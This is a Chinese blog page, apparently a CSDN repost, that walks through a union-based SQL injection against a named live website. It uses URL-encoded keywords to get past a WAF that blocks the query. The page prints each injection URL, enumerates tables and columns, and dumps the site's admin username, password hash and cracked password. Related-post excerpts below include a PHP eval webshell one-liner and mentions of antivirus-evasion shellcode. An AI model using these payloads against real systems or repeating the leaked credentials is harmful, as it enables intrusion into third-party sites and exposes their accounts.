php 编码绕过,WAF绕过方法之URL编码 | CN-SEC 中文网

最新推荐文章于 2023-11-13 10:24:13 发布
最新推荐文章于 2023-11-13 10:24:13 发布
阅读量326 收藏
点赞数
文章标签: php 编码绕过

SQL注入 WAF URL编码 数据库信息泄露 安全防护
关键词由CSDN通过智能技术生成

实例讲解如何利用URL编码绕过WAF防护

20130507125331671-300x189.jpg

SQL注入点

http://www.magrabiyemen.com/contents.php?id=3

字段数为4

http://www.magrabiyemen.com/contents.php?id=3 order by 4

显示位为4

http://www.magrabiyemen.com/contents.php?id=3 union select 1,2,3,4

显示基本信息正常

20130510020517172-300x47.jpg

http://www.magrabiyemen.com/contents.php?id=3 UNION SELECT 1,2,3,CONCAT_WS(CHAR(32,58,32),user(),database(),version())

暴表的时候出现not acceptable

20130510020601637-300x55.jpg

http://www.magrabiyemen.com/contents.php?id=3 UNION SELECT 1,2,3,group_concat(table_name) from information_schema.tables where table_schema=database()

尝试绕过,不成功,依然返回上图所示

http://www.magrabiyemen.com/contents.php?id=3 /*!12345UNION*/ /*!12345SELECT*/ 1,2,3,group_concat(table_name) from information_schema.tables where table_schema=database()

使用URL编码成功绕过(t经过URL编码后为%74)

http://www.magrabiyemen.com/contents.php?id=3 UNION SELECT 1,2,3,group_concat(%74able_name) from informa%74ion_schema.tables where %74able_schema=da%74abase()

20130510020803360-300x38.jpg

http://www.magrabiyemen.com/contents.php?id=3 UNION SELECT 1,2,3,group_concat(column_name) from informa%74ion_schema.columns where table_name=CHAR(117, 115, 101, 114, 115)

20130510020825331-300x36.jpg

http://www.magrabiyemen.com/contents.php?id=3 UNION SELECT 1,2,3,group_concat(username,0x3a,password) from users

20130510020846515-300x57.jpg

admin:ea4ce35c2860112178e8ae2285579919

解密出来为:admin/123456789987654321

from www.waitalone.cn.thanks for it.

赤水.鲁
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
史上最详细的sqlmap使用教程
大河之犬的博客
09-19 4万+
sqlmapsqlmap是一个自动化的SQL注入工具,其主要功能是扫描,发现并利用给定的URL进行SQL注入。目前支持的数据库有MySql、Oracle、Access、PostageSQL、SQL Server、IBM DB2、SQLite、Firebird、Sybase和SAP MaxDB等Sqlmap采用了以下5种独特的SQL注入技术基于布尔类型的盲注,即可以根据返回页面判断条件真假的注入。
渗透测试 ( 2 ) --- 渗透测试系统、靶机、GoogleHacking、kali工具
墨鱼菜鸡
07-11 2338
操作系统:https://zhuanlan.zhihu.com/p/162865015 1、基于 Windows、Linux、Android 的渗透测试系统 1.1 基于 Linux 的系统 Kali:https://www.kali.org/get-kali/Parrot Security OS:Parrot Securitybackbox:ht...
php-waf合集
12-24
压缩包内包含php版本的waf,支持过滤非法字符及文件等功能
PHP代码层防护与绕过
10-24 403
0x01 前言   在一些网站通常会在公用文件引入全局防护代码进行SQL注入、XSS跨站脚本等漏洞的防御,在一定程度上对网站安全防护还是比较有效的。   这里讨论一下关键字过滤不完善及常见正则匹配存在的问题,并收集了网络上常见的PHP全局防护代码进行分析。   Bypass思路:只考虑关键字被过滤如何进行Bypass的问题,暂不考虑关键字替换绕过的情况。 0x02 关键字过滤 ...
PHP字符编码绕过漏洞总结
weixin_30535843的博客
08-22 273
其实这东西国内少数黑客早已知道,只不过没有共享公布而已。有些人是不愿共享,宁愿烂在地里,另外的一些则是用来牟利。 该漏洞最早2006年被国外用来讨论数据库字符集设为GBK时,0xbf27本身不是一个有效的GBK字符,但经过addslashes() 转换后 变为0xbf5c27,前面的0xbf5c是个有效的GBK字符,所以0xbf5c27会被当作一个字符0xbf5c和一个单引号来处...
WAF绕过方法URL编码
asdfghjkl978564的博客
11-02 719
(1)SQL注入点contents.php?id=3(2)字段数contents.php?id=3 order by 4(3)显示位数4contents.php?id=3 union select 1,2,3,4正常(4)爆出用户名,数据库,版本号contents.php?id=3 UNION select 1,2,3,contents.php?id=3 UNION SELECT 1,2...
WEB安全之:文件上传
f_carey的博客
05-29 828
郑重声明: 本笔记编写目的只用于安全知识提升,并与更多人共享安全知识,切勿使用笔记中的技术进行违法活动,利用笔记中的技术造成的后果与作者本人无关。倡导维护网络安全人人有责,共同维护网络文明和谐。 WEB安全之:文件上传1 文件上传过程1.1 浏览器打开上传页面1.2 用户提交上传请求1.3 WEB 程序处理1.4 按规则存放文件2 PHP 文件上传 error 的错误类型3 文件上传漏洞3.1 原理3.2 可能造成上传漏洞的原因3.2.1 程序代码或系统缺陷3.2.2 程序逻辑缺陷3.2.3 不当配置3.
红队系列-shellcode AV bypass Evasion免杀合集
最新发布
aming小老弟
11-13 1196
壳就是软件所增加的保护,并不会破坏里面的程序结构,当我们运行这个加壳的程序时,系统首先会运行程序里的壳,然后由壳将加密的程序逐步还原到内存中,最后运行程序。加壳虽然对于特征码绕过有非常好的效果,加密壳基本上可以把特征码全部掩盖,但是缺点也非常的明显,因为壳自己也有特征,主流的壳如VMP, Themida等等。客户端上传特征,在云端无法检测到,则上传文件,文件通过杀软系统进行评判,得出总评分,对于无结果的,进行鉴定系统评分,总共得出结果返回给用户,并入云端库。比如可以远程读取png中的shellcode。
web安全-PHP-url编码取反绕过正则-思考
qq_45699846的博客
03-09 4692
web安全-PHP-url编码取反绕过正则-思考
基于PHP扩展的WAF实现
swordheart的博客
04-23 2181
0x00 前言 最近上(ri)网(zhan)上(ri)多了,各种狗啊盾啊看的好心烦,好多蜜汁shell都被杀了,搞的我自己也想开发这么一个斩马刀,顺便当作毕设来做了。 未知攻,焉知防。我们先来看看shell们都是怎么躲过查杀的:加密、变形、回调、隐藏关键字……总之就是一句话,让自己变得没有特征,这样就可以躲过狗和盾的查杀。但是万变不离其宗,无论怎么变形,最终都会回到类似这样的格式: 1 2 3 <code>#!php $_GET($_P
php扩展 waf,基于PHP扩展的WAF实现
weixin_39622655的博客
03-18 229
访问一下看看结果:可以看到ls命令成功的执行了,也就是说我们的正常文件是不会被拦截的,而只有upload目录中的文件会被拦截,这样做又会引发另一个弊端,倘若攻击者通过某种方法将shell写入正常的文件中,或是与业务结合起来,那么这种防御手段就很难生效了。具体如何防御还要结合其他的特征进行检测,并不是没有办法了,实际应用中不能只依靠检测文件路径这一条规则,需要结合业务进行部署防御方案。另一种方法与这...
php编写的通防waf
06-12 2804
几乎能抵御所有web层能导致getshell的攻击(暴力) 在多次线下攻防比赛中表现优异,几乎没有被攻破 添加日志记录,流量记录功能 简洁日志 all_requests.txt记录的类似于apache的日志,但是它能显示出每次访问POST过来的数据 详细日志 all_requests_details.txt记录的是详细的请求头信息,类似burp中截取的请求。 攻击流量 attack_detect_log.txt记录的是waf检测到的攻击请求,waf会将详细的攻击向量记录在这个文件中,并在文件开头表
使用图片包含php代码 。绕过对文件内容检测的文件上传的waf
m0_63028223的博客
06-16 774
先随便新建一个图片:然后我把它放在我的kali里边。用vi查看一下内容:箭头所指的是图片的文件头格式。为了避免解析失败,将除去文件头的内容删去。.按esc输入开始到结束的行数+d可实现快速删除指定内容。 保存并退出。 在1.php中准备好代码。.cat 1.php >> 2.png 将1php的内容复制在2.png的内容后边。 现在我们用PHP解析一下 2.png代码执行成功。这样就可以绕过对文件内容检测的文件上传的waf了。仅供学习参考,请勿用于非法用途。...
PHP waf加固sql注入和xss注入
单核CPU的小朋友的博客
05-02 1708
PHP WAF 代码如下: <?php #this php page is provide the safe value. class waf { private $input; private $pattern; private $log_path; function __construct() { session_start()...
Bugku-urldecode二次编码绕过
王嘟嘟的博客
10-25 3970
0x00 前言 今日份CTF。 时间 2018年10月25日 题目 0x01 start 1.分析 这是一道代码审计的题目。 所以先来看看代码。 &lt;?php if(eregi("hackerDJ",$_GET[id])) { echo(" not allowed! "); exit(); } $_GET[id] = urldecode($_GET[id]); if($_GET[id] ...
WAF绕过--小马绕过
wwxxee
05-17 860
WAF绕过之小马免杀 WAF:安全狗-Apache版 v4 正常的PHP一句话木马: <?php eval($_REQUEST[6]);?> 对于这个正常的一句话木马,安全狗会拦截。 关于拦截其实最主要的还是测试,看看Waf究竟怎么拦截。[最直接的检测应该是正则匹配] 我们尝试只写<?php eval();?> 发现没有拦截,但是加了REQUEST[6]就拦截了那么我们是不是可以尝试测试看看究竟拦截_REQUEST[6]就拦截了 那么我们是不是可以尝试测试看看究竟拦截R​EQUES
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值